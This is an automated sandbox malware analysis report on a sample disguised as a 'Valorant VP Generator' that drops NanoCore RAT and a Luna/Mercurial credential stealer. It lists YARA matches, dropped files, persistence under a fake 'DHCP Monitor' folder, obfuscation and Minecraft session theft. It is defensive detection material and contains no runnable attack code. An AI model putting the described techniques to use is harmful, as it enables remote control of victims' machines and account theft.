Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\ProgramData\output.exe, type: DROPPED	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Detected potential crypto function

Source: C:\ProgramData\nano.exe	Code function: 2_2_00A8524A	2_2_00A8524A
Source: C:\ProgramData\nano.exe	Code function: 2_2_011E7ABE	2_2_011E7ABE
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B8918	2_2_053B8918
Source: C:\ProgramData\nano.exe	Code function: 2_2_053BB1E8	2_2_053BB1E8
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B3850	2_2_053B3850
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B2FA8	2_2_053B2FA8
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B23A0	2_2_053B23A0
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B9518	2_2_053B9518
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B95DF	2_2_053B95DF
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B306F	2_2_053B306F
Source: C:\ProgramData\output.exe	Code function: 5_2_00007FFC085B3551	5_2_00007FFC085B3551

Contains functionality to call native functions

Source: C:\ProgramData\nano.exe	Code function: 2_2_054D18D2 NtQuerySystemInformation,		2_2_054D18D2
Source: C:\ProgramData\nano.exe	Code function: 2_2_054D1897 NtQuerySystemInformation,		2_2_054D1897

Sample file is different than original file name gathered from version info

Source: 4Y85lSOUJ0.exe	Binary or memory string: OriginalFilename vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameValorant VP Generator.exe, vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevampire.dll4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287481820.0000000001140000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenamevampire.dll4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe	Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe	Binary or memory string: OriginalFilenameValorant VP Generator.exe, vs 4Y85lSOUJ0.exe

PE file contains strange resources

Source: 4Y85lSOUJ0.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 4Y85lSOUJ0.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: nano.exe.0.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996271306818
Source: dhcpmon.exe.2.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996271306818

Source: 4Y85lSOUJ0.exe	Virustotal: Detection: 73%
Source: 4Y85lSOUJ0.exe	ReversingLabs: Detection: 82%

Source: 4Y85lSOUJ0.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4Y85lSOUJ0.exe "C:\Users\user\Desktop\4Y85lSOUJ0.exe"
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"
Source: C:\ProgramData\output.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\ProgramData\nano.exe	Code function: 2_2_054D1692 AdjustTokenPrivileges,		2_2_054D1692
Source: C:\ProgramData\nano.exe	Code function: 2_2_054D165B AdjustTokenPrivileges,		2_2_054D165B

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\4Y85lSOUJ0.exe.log

Jump to behavior

Source: C:\ProgramData\output.exe

File created: C:\Users\user\AppData\Local\Temp\login.db

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/9@3/3

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\nano.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\nano.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\ProgramData\nano.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\ProgramData\output.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_01
Source: C:\ProgramData\nano.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\ProgramData\nano.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{e5633be0-23ed-438f-a28c-ab363fff6ac9}

Source: C:\ProgramData\nano.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: 4Y85lSOUJ0.exe	String found in binary or memory: copy to : /\launcher_profiles.json5Minecraft Session Profiles-launcher_profiles.json'multipart/form-data
Source: 4Y85lSOUJ0.exe	String found in binary or memory: #Minecraft SessionKUnable to find launcher_profiles.jsonE\.minecraft\launcher_accounts.json/\launcher_accounts.json-launcher_accounts.jsonKUnable to find launcher_accounts.json

Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\ProgramData\output.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\output.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\output.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\ProgramData\nano.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: 4Y85lSOUJ0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 4Y85lSOUJ0.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: indows\mscorlib.pdbpdblib.pdb source: nano.exe, 00000002.00000002.552327927.0000000002DF5000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: 4Y85lSOUJ0.exe, Program.cs	.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.2.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D5C push ecx; retf	2_2_011D2D6E
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D5C push ecx; retf	2_2_011D2D86
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D5C push edi; retf	2_2_011D2DFE
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2E59 push edi; retf	2_2_011D2DF2
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2545 pushfd ; iretd	2_2_011D254E
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D3145 push eax; retf	2_2_011D314A
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D3379 pushfd ; iretd	2_2_011D338A
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2875 push edi; retf	2_2_011D2882
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D80 push ecx; retf	2_2_011D2D86
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2EB8 pushfd ; iretd	2_2_011D2ED6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D27D8 push eax; retf	2_2_011D27DA
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2FD0 push eax; retf	2_2_011D2FD6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2FC9 push esp; iretd	2_2_011D2FCA
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D29C8 pushfd ; iretd	2_2_011D29C6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D29C2 pushfd ; iretd	2_2_011D29C6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2DEC push ecx; retf	2_2_011D2D86
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2DEC push edi; retf	2_2_011D2DF2
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D32E8 push esi; iretd	2_2_011D32FA
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D28E1 push edi; retf	2_2_011D28E2
Source: C:\ProgramData\nano.exe	Code function: 2_2_011E9D78 pushad ; retf	2_2_011E9D79
Source: C:\ProgramData\nano.exe	Code function: 2_2_011E9D74 push eax; retf	2_2_011E9D75

Source: initial sample

Static PE information: section name: .text entropy: 7.20683355294

Source: dhcpmon.exe.2.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: dhcpmon.exe.2.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
